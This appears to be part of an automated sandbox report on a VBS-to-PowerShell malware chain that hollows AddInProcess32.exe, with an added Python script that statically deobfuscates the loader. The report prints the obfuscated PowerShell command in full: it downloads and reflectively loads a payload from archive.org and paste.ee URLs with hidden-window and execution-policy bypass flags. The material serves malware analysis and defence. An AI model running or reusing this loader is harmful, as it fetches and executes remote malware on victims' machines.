Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_0040F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,7_2_0040F474
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,7_2_0041B4A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,7_2_0041AA4A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2132:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-XDNGQ0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e0sszj1e.el2.ps1
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs"
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ((get-VARIAbLe '*MDr*').NaMe[3,11,2]-JoIn'') ((('k8'+'fu'+'r'+'l = c9Ihttps://ia'+'600100.us.'+'a'+'rchive'+'.org/24/items/detah-note-v/Deta'+'hNoteV.txtc'+'9I;k8fb'+'as'+'e64Cont'+'ent = '+'(N'+'ew-O'+'bject'+' System'+'.Net.WebClient).'+'Download'+'St'+'rin'+'g(k8furl)'+';k'+'8fbina'+'ryC'+'ontent ='+' ['+'Sy'+'stem.C'+'onv'+'e'+'rt]:'+':FromBase'+'64String(k8fbase64C'+'ont'+'ent'+');k8fassembly = ['+'Reflection.Assembly]'+'::'+'Load('+'k8f'+'binaryCont'+'ent);k8f'+'type '+'='+' k8fassem'+'bl'+'y.'+'GetTyp'+'e'+'(c9'+'IRunPE.H'+'omec9I);'+'k8f'+'method = '+'k'+'8ftype'+'.GetMet'+'hod(c9IVAIc9I);'+'k8fmethod.Inv'+'oke(k8fnull,'+' [ob'+'je'+'ct[]]@(c9I0/oSskW/d/ee.'+'e'+'tsap//'+':sptthc9I ,'+' c9'+'Id'+'es'+'ativ'+'ad'+'oc9I'+' '+', c9I'+'desati'+'vadoc9'+'I , c9'+'Ides'+'ativadoc9I,c'+'9IAddInProcess32c9I,c9Ic9I)'+')') -cREplACE ([CHaR]99+[CHaR]57+[CHaR]73),[CHaR]39 -rEpLAcE'k8f',[CHaR]36) )"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: winmm.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: urlmon.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: wininet.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: iertutil.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: srvcli.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: netutils.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: rstrtmgr.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: ncrypt.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: ntasn1.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: sspicli.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: mswsock.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: fwpuclnt.dll
            Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: Binary string: System.Data.Linq.pdb source: powershell.exe, 00000004.00000002.2295468999.000001B0A7DC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2268054152.000001B0A0747000.00000004.00000800.00020000.00000000.sdmp

            Data Obfuscation

            Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: .Run("powershell -command $Codigo = 'LiAoKGdldC1WQVJJQWJMZSAnKk1EcionKS5OYU1lWzM", "0", "false");
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ((get-VARIAbLe '*MDr*').NaMe[3,11,2]-JoIn'') ((('k8'+'fu'+'r'+'l = c9Ihttps://ia'+'600100.us.'+'a'+'rchive'+'.org/24/items/detah-note-v/Deta'+'hNoteV.txtc'+'9I;k8fb'+'as'+'e64Cont'+'ent = '+'(N'+'ew-O'+'bject'+' System'+'.Net.WebClient).'+'Download'+'St'+'rin'+'g(k8furl)'+';k'+'8fbina'+'ryC'+'ontent ='+' ['+'Sy'+'stem.C'+'onv'+'e'+'rt]:'+':FromBase'+'64String(k8fbase64C'+'ont'+'ent'+');k8fassembly = ['+'Reflection.Assembly]'+'::'+'Load('+'k8f'+'binaryCont'+'ent);k8f'+'type '+'='+' k8fassem'+'bl'+'y.'+'GetTyp'+'e'+'(c9'+'IRunPE.H'+'omec9I);'+'k8f'+'method = '+'k'+'8ftype'+'.GetMet'+'hod(c9IVAIc9I);'+'k8fmethod.Inv'+'oke(k8fnull,'+' [ob'+'je'+'ct[]]@(c9I0/oSskW/d/ee.'+'e'+'tsap//'+':sptthc9I ,'+' c9'+'Id'+'es'+'ativ'+'ad'+'oc9I'+' '+', c9I'+'desati'+'vadoc9'+'I , c9'+'Ides'+'ativadoc9I,c'+'9IAddInProcess32c9I,c9Ic9I)'+')') -cREplACE ([CHaR]99+[CHaR]57+[CHaR]73),[CHaR]39 -rEpLAcE'k8f',[CHaR]36) )" (entry repeated 4 times in the original report)
            Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD (entry repeated 2 times in the original report)
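The command lines above stack four cheap obfuscation layers that defeat keyword matching but not static analysis: `(get-Variable '*MDr*').Name[3,11,2] -join ''` spells `iex` out of the letters of the preference variable `MaximumDriveCount` (indices 3, 11, 2); the payload is a long `'…'+'…'` concatenation; two trailing operators, `-creplace` with `[char]99+[char]57+[char]73` (the string `c9I`) mapped to `[char]39` (a single quote) and `-replace 'k8f'` mapped to `[char]36` (`$`), restore the quotes and variable sigils; and the first argument handed to `RunPE.Home.VAI` is a URL stored backwards. The wscript stage passes the same second stage to PowerShell base64-encoded in `$Codigo`, which is why the AMSI prefix `LiAoKGdl…` decodes to the start of it. The following Python is an added example written for this page, not part of the Joe Sandbox report or of the sample: it undoes each layer statically, without ever executing PowerShell, using the second-stage command line and the AMSI base64 prefix copied from the report. The list of preference variables used to resolve the `*MDr*` wildcard is an assumption (a fixed set of well-known PowerShell variables stands in for a live session).

```python
import base64
import fnmatch
import re

# Second-stage command line exactly as it appears in the report above
# (the argument powershell.exe passes to the child powershell.exe).
OBFUSCATED = (
    ". ((get-VARIAbLe '*MDr*').NaMe[3,11,2]-JoIn'') ((('k8'+'fu'+'r'+'l = c9Ihttps://ia'+'600100.us.'"
    "+'a'+'rchive'+'.org/24/items/detah-note-v/Deta'+'hNoteV.txtc'+'9I;k8fb'+'as'+'e64Cont'+'ent = '"
    "+'(N'+'ew-O'+'bject'+' System'+'.Net.WebClient).'+'Download'+'St'+'rin'+'g(k8furl)'+';k'+'8fbina'"
    "+'ryC'+'ontent ='+' ['+'Sy'+'stem.C'+'onv'+'e'+'rt]:'+':FromBase'+'64String(k8fbase64C'+'ont'+'ent'"
    "+');k8fassembly = ['+'Reflection.Assembly]'+'::'+'Load('+'k8f'+'binaryCont'+'ent);k8f'+'type '+'='"
    "+' k8fassem'+'bl'+'y.'+'GetTyp'+'e'+'(c9'+'IRunPE.H'+'omec9I);'+'k8f'+'method = '+'k'+'8ftype'"
    "+'.GetMet'+'hod(c9IVAIc9I);'+'k8fmethod.Inv'+'oke(k8fnull,'+' [ob'+'je'+'ct[]]@(c9I0/oSskW/d/ee.'"
    "+'e'+'tsap//'+':sptthc9I ,'+' c9'+'Id'+'es'+'ativ'+'ad'+'oc9I'+' '+', c9I'+'desati'+'vadoc9'"
    "+'I , c9'+'Ides'+'ativadoc9I,c'+'9IAddInProcess32c9I,c9Ic9I)'+')') -cREplACE ([CHaR]99+[CHaR]57+[CHaR]73),[CHaR]39"
    " -rEpLAcE'k8f',[CHaR]36) )"
)

# Truncated base64 prefix of $Codigo that AMSI logged inside wscript.exe (from the report).
STAGE1_B64_PREFIX = "LiAoKGdldC1WQVJJQWJMZSAnKk1EcionKS5OYU1lWzM"

# PowerShell preference variables present in every session. Assumption: the
# '*MDr*' wildcard is resolved against this fixed list instead of a live shell.
PREFERENCE_VARIABLES = [
    "MaximumAliasCount", "MaximumDriveCount", "MaximumErrorCount",
    "MaximumFunctionCount", "MaximumHistoryCount", "MaximumVariableCount",
]

# Either "( [char]N + [char]M ... )" or a single-quoted literal.
CHAR_OR_LITERAL = r"(?:\(?\s*(?:\[char\]\d+\s*\+?\s*)+\)?|'[^']*')"


def decode_truncated_base64(prefix):
    """Pad and decode a base64 string that was cut off mid-stream (AMSI log excerpt)."""
    padded = prefix + "=" * (-len(prefix) % 4)
    return base64.b64decode(padded).decode("utf-8", errors="replace")


def resolve_variable_name_trick(cmd):
    """(get-Variable '*MDr*').Name[3,11,2] -join '' spells a cmdlet name from the
    letters of a wildcard-matched variable. Returns (name, offset past the expression)."""
    m = re.search(r"\(get-variable\s+'([^']+)'\)\.name\[([\d,\s]+)\]\s*-join\s*''",
                  cmd, re.IGNORECASE)
    if not m:
        raise ValueError("no get-Variable name-indexing trick found")
    matches = [v for v in PREFERENCE_VARIABLES
               if fnmatch.fnmatchcase(v.lower(), m.group(1).lower())]
    if len(matches) != 1:
        raise ValueError("wildcard is ambiguous: %r" % matches)
    return "".join(matches[0][int(i)] for i in m.group(2).split(",")), m.end()


def ps_value(expr):
    """Evaluate '[char]99+[char]57+[char]73' -> 'c9I', or a single-quoted literal."""
    expr = expr.strip()
    if expr.startswith("'"):
        return expr[1:-1].replace("''", "'")
    return "".join(chr(int(n)) for n in re.findall(r"\[char\](\d+)", expr, re.IGNORECASE))


def join_string_concatenation(concat):
    """'a'+'b'+'c' -> 'abc' (PowerShell escapes a quote inside '...' as '')."""
    return "".join(s.replace("''", "'") for s in re.findall(r"'((?:[^']|'')*)'", concat))


def apply_replace_operators(text, ops):
    """Apply each trailing -creplace/-replace pair in order; -replace ignores case."""
    pattern = r"-(c?replace)\s*(%s)\s*,\s*(%s)" % (CHAR_OR_LITERAL, CHAR_OR_LITERAL)
    for op, pat, repl in re.findall(pattern, ops, re.IGNORECASE):
        value = ps_value(repl)
        flags = 0 if op.lower() == "creplace" else re.IGNORECASE
        text = re.sub(ps_value(pat), lambda _m: value, text, flags=flags)
    return text


def deobfuscate(cmd):
    verb, pos = resolve_variable_name_trick(cmd)
    rest = cmd[pos:]
    # Payload shape: "((( '...'+'...' ) -creplace ... -replace ...))": split at the
    # first replace operator that follows the closing parenthesis of the literals.
    split = re.search(r"\)\s*-c?replace\b", rest, re.IGNORECASE)
    if not split:
        raise ValueError("no -replace operators found")
    script = apply_replace_operators(join_string_concatenation(rest[:split.start()]),
                                     rest[split.start():])
    literals = re.findall(r"'([^']*)'", script)
    # Reversed-string obfuscation: a literal that only makes sense read backwards.
    reversed_urls = [s[::-1] for s in literals if s[::-1].lower().startswith("http")]
    m = re.search(r"\[object\[\]\]@\((.*?)\)\)", script)
    runpe_args = re.findall(r"'([^']*)'", m.group(1)) if m else []
    return {"verb": verb, "script": script,
            "reversed_urls": reversed_urls, "runpe_args": runpe_args}


if __name__ == "__main__":
    result = deobfuscate(OBFUSCATED)
    print("stage 1 prefix decodes to:", decode_truncated_base64(STAGE1_B64_PREFIX))
    print("verb:", result["verb"])
    print("script:", result["script"])
    print("reversed URL(s):", result["reversed_urls"])
    print("RunPE host process:", result["runpe_args"][4])
```

Running it recovers the cleartext stage: `$url = 'https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt'`, a `DownloadString` of that file, `[Reflection.Assembly]::Load` of its base64-decoded bytes, and a call to `RunPE.Home.VAI` whose first argument reverses to `https://paste.ee/d/WksSo/0` and whose fifth argument is `AddInProcess32`, which is exactly the process the report shows being hollowed. Because the replace operators are evaluated with the same case sensitivity as PowerShell (`-creplace` exact, `-replace` case-insensitive), the decoder also copes with variants that rename `c9I`/`k8f` or change their case.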
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,7_2_0041CB50
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD347715F0 pushad ; ret 4_2_00007FFD3477160D
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 4_2_00007FFD347735FA push eax; ret 4_2_00007FFD34773601
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_00457106 push ecx; ret 7_2_00457119
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_0045B11A push esp; ret 7_2_0045B141
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_0045E54D push esi; ret 7_2_0045E556
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_00457A28 push eax; ret 7_2_00457A46
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_00434E56 push ecx; ret 7_2_00434E69
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_00406EB0 ShellExecuteW,URLDownloadToFileW,7_2_00406EB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,7_2_0041AA4A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 7_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,7_2_0041CB50
            Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX (entry repeated 3 times in the original report)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (entry repeated 100 times in the original report)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
